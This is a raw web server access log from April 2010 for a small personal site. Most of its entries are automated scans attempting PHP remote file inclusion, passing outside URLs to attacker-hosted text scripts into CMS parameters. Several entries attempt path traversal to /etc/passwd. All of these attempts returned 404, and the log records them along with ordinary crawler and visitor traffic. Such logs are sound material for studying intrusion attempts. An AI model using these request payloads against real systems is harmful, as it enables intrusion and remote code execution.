66.244.236.248 - - [27/Apr/2010:20:38:15 -0500] "GET /logs/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:38:15 -0500] "GET /logs/access_log.1271030400/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:38:50 -0500] "GET /logs/access_log.1219363200%20%20/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:38:50 -0500] "GET /logs/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:38:50 -0500] "GET /db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 290 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:38:56 -0500] "GET /logs/access_log.1271030400%20%20/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:39:03 -0500] "GET /db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 290 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:39:03 -0500] "GET /logs/access_log.1219363200/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:39:04 -0500] "GET /logs/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:39:04 -0500] "GET /logs/access_log.1271030400/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:40:42 -0500] "GET /logs/access_log.1263513600/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:40:45 -0500] "GET /logs/access_log.1262304000/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:42:58 -0500] "GET /logs/access_log.1271030400%20%20/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:42:58 -0500] "GET /logs/access_log.1219363200%20%20/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:44:17 -0500] "GET /logs/access_log.1219363200/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:44:17 -0500] "GET /logs/access_log.1271030400/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:45:07 -0500] "GET /logs/access_log.1219363200%20%20/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:45:07 -0500] "GET /logs/access_log.1271030400%20%20/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
89.29.194.52 - - [27/Apr/2010:20:45:40 -0500] "GET /logs/access_log.1263945600 HTTP/1.1" 404 310 "http://www.google.ru/search?sourceid=navclient-menuext&ie=UTF-8&q=89.29.194.52""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.5; .NET CLR 1.1.4322)"
66.244.236.248 - - [27/Apr/2010:20:46:56 -0500] "GET /logs/access_log.1271030400%20%20/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:46:56 -0500] "GET /logs/access_log.1219363200%20%20/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:47:28 -0500] "GET /logs/access_log.1263513600/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:47:29 -0500] "GET /logs/access_log.1262304000/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:48:38 -0500] "GET /logs/access_log.1219363200/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.244.236.248 - - [27/Apr/2010:20:48:38 -0500] "GET /logs/access_log.1271030400/db.php?path_local=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
67.195.112.180 - - [27/Apr/2010:20:49:51 -0500] "GET /artwork/dioramas.htm HTTP/1.0" 200 1230 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.3.46.64 - - [27/Apr/2010:21:22:44 -0500] "GET //pivot/modules/module_db.php?pivot_path=http://77.92.94.85/echos.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.813"
87.3.46.64 - - [27/Apr/2010:21:22:44 -0500] "GET /logs//pivot/modules/module_db.php?pivot_path=http://77.92.94.85/echos.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.813"
67.195.112.180 - - [27/Apr/2010:21:23:24 -0500] "GET /logs/access_log.1271376000 HTTP/1.0" 200 664329 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [27/Apr/2010:21:28:21 -0500] "GET /logs/access_log.1223164800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.249.126.147 - - [27/Apr/2010:21:36:03 -0500] "GET /modules/My_eGallery/index.php?basepath=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
72.249.126.147 - - [27/Apr/2010:21:36:03 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
72.249.126.147 - - [27/Apr/2010:21:36:03 -0500] "GET /logs/access_log.1220054400%20%20/modules/My_eGallery/index.php?basepath=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
81.208.34.38 - - [27/Apr/2010:21:38:37 -0500] "GET /logs/access_log.1219363200%20%20//main.php?sayfa=http://empcl.org/bbs/img/bogel/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.208.34.38 - - [27/Apr/2010:21:38:37 -0500] "GET /logs//main.php?sayfa=http://empcl.org/bbs/img/bogel/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.208.34.38 - - [27/Apr/2010:21:38:40 -0500] "GET //main.php?sayfa=http://empcl.org/bbs/img/bogel/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.249.126.147 - - [27/Apr/2010:21:46:33 -0500] "GET /logs/access_log.1220054400/modules/My_eGallery/index.php?basepath=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
65.55.106.180 - - [27/Apr/2010:21:58:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.182 - - [27/Apr/2010:21:59:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [27/Apr/2010:22:36:20 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.15.156.83 - - [27/Apr/2010:22:42:42 -0500] "GET //galeria.php?start=0&kategoria=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
64.15.156.83 - - [27/Apr/2010:22:42:42 -0500] "GET /logs//galeria.php?start=0&kategoria=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
64.15.156.83 - - [27/Apr/2010:22:42:42 -0500] "GET /logs/access_log.1271030400//galeria.php?start=0&kategoria=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:22:42:50 -0500] "GET ///wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:22:42:50 -0500] "GET /logs/access_log.1264464000///wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 379 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:22:42:50 -0500] "GET /logs///wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
64.15.156.83 - - [27/Apr/2010:22:43:49 -0500] "GET /logs/access_log.1271030400%20%20//galeria.php?start=0&kategoria=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.115.111.248 - - [27/Apr/2010:22:47:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
64.15.156.83 - - [27/Apr/2010:22:49:00 -0500] "GET /logs/access_log.1264723200//galeria.php?start=0&kategoria=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.40.30.37 - - [27/Apr/2010:22:52:16 -0500] "GET //cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [27/Apr/2010:22:52:18 -0500] "GET //cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [27/Apr/2010:22:52:21 -0500] "GET /logs//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.40.30.37 - - [27/Apr/2010:22:52:21 -0500] "GET /logs/access_log.1270684800//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
84.40.30.37 - - [27/Apr/2010:22:52:23 -0500] "GET /logs//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.40.30.37 - - [27/Apr/2010:22:52:23 -0500] "GET /logs/access_log.1270684800//cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
24.3.248.23 - - [27/Apr/2010:22:53:30 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://images.ask.com/fr?q=Vintage+Tattoo+Flash&desturi=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo-order.htm&initialURL=http%3A%2F%2Fwww.ask.com%2Fpictures%3Fq%3DVintage%2BTattoo%2BFlash%26qsrc%3D6%26o%3D14215%26l%3Ddis%26ni%3D&fm=i&ac=268&fsel=1&ftURI=http%3A%2F%2Fimages.ask.com%2Ffr%3Fq%3DVintage%2BTattoo%2BFlash%26desturi%3Dhttp%253A%252F%252Ftomdolan.pconline.com%252Ftattoo%252Ftattoo-order.htm%26imagesrc%3Dhttp%253A%252F%252Ftomdolan.pconline.com%252Ftattoo%252Ftat-cd1.jpg%26thumbsrc%3Dhttp%253A%252F%252Fimgtn1.ask.com%252Fts%253Ft%253D10870971925027161795%2526pid%253D23296%2526ppid%253D15%26o%3D14215%26l%3Ddis%26thumbuselocalisedstatic%3Dfalse%26fn%3Dtat-cd1.jpg%26imagewidth%3D405%26imageheight%3D364%26fs%3D67%26ft%3Djpg%26f%3D2%26fm%3Di%26fsel%3D1%26ftbURI%3Dhttp%253A%252F%252Fwww.ask.com%252Fpictures%253Fq%253DVintage%252BTattoo%252BFlash%2526page%253D1%2526o%253D14215%2526l%253Ddis%2526pstart%253D0&qt=0""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.3.248.23 - - [27/Apr/2010:22:53:30 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.3.248.23 - - [27/Apr/2010:22:53:30 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.3.248.23 - - [27/Apr/2010:22:53:30 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.3.248.23 - - [27/Apr/2010:22:53:30 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
24.3.248.23 - - [27/Apr/2010:22:53:31 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
67.195.112.180 - - [27/Apr/2010:22:53:46 -0500] "GET /logs/access_log.1166572800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [27/Apr/2010:22:55:02 -0500] "GET /logs/access_log.1232409600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.175.97.18 - - [27/Apr/2010:22:57:00 -0500] "GET /logs/access_log.1265760000//plugins/spamx/BaseAdmin.class.php?_CONF=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.97.18 - - [27/Apr/2010:22:57:00 -0500] "GET /logs//plugins/spamx/BaseAdmin.class.php?_CONF=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.97.18 - - [27/Apr/2010:22:57:00 -0500] "GET //plugins/spamx/BaseAdmin.class.php?_CONF=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
72.249.126.147 - - [27/Apr/2010:23:05:53 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
72.249.126.147 - - [27/Apr/2010:23:05:53 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.249.126.147 - - [27/Apr/2010:23:05:53 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.195.112.180 - - [27/Apr/2010:23:06:39 -0500] "GET /logs/access_log.1204761600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.249.126.147 - - [27/Apr/2010:23:08:52 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
72.249.126.147 - - [27/Apr/2010:23:09:20 -0500] "GET /logs/access_log.1268265600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
118.217.216.132 - - [27/Apr/2010:23:09:57 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
118.217.216.132 - - [27/Apr/2010:23:09:57 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
118.217.216.132 - - [27/Apr/2010:23:09:57 -0500] "GET /logs/access_log.1271030400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
118.217.216.132 - - [27/Apr/2010:23:09:57 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
118.217.216.132 - - [27/Apr/2010:23:09:57 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
118.217.216.132 - - [27/Apr/2010:23:09:57 -0500] "GET /logs/access_log.1271030400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
118.217.216.132 - - [27/Apr/2010:23:10:30 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
118.217.216.132 - - [27/Apr/2010:23:10:31 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
118.217.216.132 - - [27/Apr/2010:23:10:31 -0500] "GET /logs/access_log.1271030400%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
118.217.216.132 - - [27/Apr/2010:23:10:35 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
118.217.216.132 - - [27/Apr/2010:23:10:35 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
118.217.216.132 - - [27/Apr/2010:23:10:36 -0500] "GET /logs/access_log.1271030400%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
222.231.60.209 - - [27/Apr/2010:23:12:54 -0500] "GET /logs/access_log.1271030400%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
222.231.60.209 - - [27/Apr/2010:23:12:54 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.231.60.209 - - [27/Apr/2010:23:12:54 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
65.55.207.136 - - [27/Apr/2010:23:19:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.231.60.209 - - [27/Apr/2010:23:21:35 -0500] "GET /logs/access_log.1270684800%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
222.231.60.209 - - [27/Apr/2010:23:21:35 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
222.231.60.209 - - [27/Apr/2010:23:21:35 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.231.60.209 - - [27/Apr/2010:23:21:37 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.231.60.209 - - [27/Apr/2010:23:21:37 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
222.231.60.209 - - [27/Apr/2010:23:21:37 -0500] "GET /logs/access_log.1270684800%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/thumb/id1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
208.115.111.248 - - [27/Apr/2010:23:21:39 -0500] "GET /logs/access_log.1214352000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Apr/2010:23:21:45 -0500] "GET /logs/access_log.1223856000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Apr/2010:23:21:47 -0500] "GET /logs/access_log.1225756800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Apr/2010:23:21:50 -0500] "GET /logs/access_log.1226361600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [27/Apr/2010:23:21:53 -0500] "GET /logs/access_log.1238544000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
81.21.79.214 - - [27/Apr/2010:23:24:24 -0500] "GET /logs/access_log.1212969600//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
81.21.79.214 - - [27/Apr/2010:23:24:24 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.21.79.214 - - [27/Apr/2010:23:24:24 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.140.247.10 - - [27/Apr/2010:23:24:38 -0500] "GET /logs/access_log.1263513600//plugins/spamx/BaseAdmin.class.php?_CONF=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.140.247.10 - - [27/Apr/2010:23:24:38 -0500] "GET /logs/access_log.1265760000//plugins/spamx/BaseAdmin.class.php?_CONF=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.140.247.10 - - [27/Apr/2010:23:24:38 -0500] "GET //plugins/spamx/BaseAdmin.class.php?_CONF=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.140.247.10 - - [27/Apr/2010:23:24:38 -0500] "GET /logs//plugins/spamx/BaseAdmin.class.php?_CONF=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.247.10 - - [27/Apr/2010:23:24:59 -0500] "GET //plugins/spamx/BaseAdmin.class.php?_CONF=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.140.247.10 - - [27/Apr/2010:23:24:59 -0500] "GET /logs//plugins/spamx/BaseAdmin.class.php?_CONF=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.140.247.10 - - [27/Apr/2010:23:24:59 -0500] "GET /logs/access_log.1263513600//plugins/spamx/BaseAdmin.class.php?_CONF=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.140.247.10 - - [27/Apr/2010:23:27:53 -0500] "GET /logs/access_log.1265760000//plugins/spamx/BaseAdmin.class.php?_CONF=http://www.luomoeillegno.com/extras/idxx.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
74.86.210.130 - - [27/Apr/2010:23:29:01 -0500] "GET /logs/access_log.1268611200//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
74.86.210.130 - - [27/Apr/2010:23:29:02 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.86.210.130 - - [27/Apr/2010:23:29:02 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
74.86.210.130 - - [27/Apr/2010:23:29:32 -0500] "GET /logs/access_log.1219363200//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
222.236.47.182 - - [27/Apr/2010:23:29:50 -0500] "GET /logs//admin/auth.php?xcart_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:23:29:50 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.236.47.182 - - [27/Apr/2010:23:29:50 -0500] "GET //admin/auth.php?xcart_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.15.156.83 - - [27/Apr/2010:23:33:23 -0500] "GET //components/errors.php?error=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
64.15.156.83 - - [27/Apr/2010:23:33:23 -0500] "GET /logs//components/errors.php?error=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.15.156.83 - - [27/Apr/2010:23:33:23 -0500] "GET /logs/access_log.1220054400//components/errors.php?error=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
212.174.28.46 - - [27/Apr/2010:23:34:03 -0500] "GET //vbgsitemap/vbgsitemap-config.php?base=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
212.174.28.46 - - [27/Apr/2010:23:34:03 -0500] "GET /logs//vbgsitemap/vbgsitemap-config.php?base=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
212.174.28.46 - - [27/Apr/2010:23:34:03 -0500] "GET /logs/access_log.1233532800//vbgsitemap/vbgsitemap-config.php?base=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
